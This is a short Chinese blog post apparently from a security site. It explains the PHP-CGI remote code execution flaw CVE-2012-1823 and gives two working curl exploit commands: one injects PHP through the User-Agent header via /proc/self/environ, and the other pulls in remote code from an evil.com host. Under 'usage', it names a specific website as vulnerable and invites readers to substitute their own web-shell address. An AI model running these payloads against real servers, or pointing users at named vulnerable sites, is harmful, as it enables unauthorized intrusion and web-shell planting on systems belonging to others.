CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战

2012-05-04 168536人围观 ,发现 4 个不明物体 WEB安全文章

国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。

另外关于RCE的PoC原文没有给出,不过说明的确可以远程执行代码。那么他是怎么做到的呢?我粗略想了想,可以利用的参数只有一个-d参数了,作用是给php定义一个ini的值。

那么利用它能做什么呢?我给出如下两个RCE的PoC方案:

1、本地包含直接执行代码:
curl -H “USER-AGENT: <?system(‘id’);die();?>” http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n

2、远程包含执行代码:
curl http://target.com/test.php?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3a%2f%2Fwww.evil.com%2fevil.txt

经过测试以上两者都可以,但其实就是一个包含文件的两种使用而已。
各位看看还有什么牛逼的方法可以绕过限制直接远程执行代码呢?这会是一个很好玩的技术挑战。

使用方法:

http://gdfreenet.cn/new.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.test.com/2.txt
这是个有漏洞的站,大家把网马地址换成自己的就成了

文/GaRY

发表评论

已有 4 条评论

取消
Loading...
css.php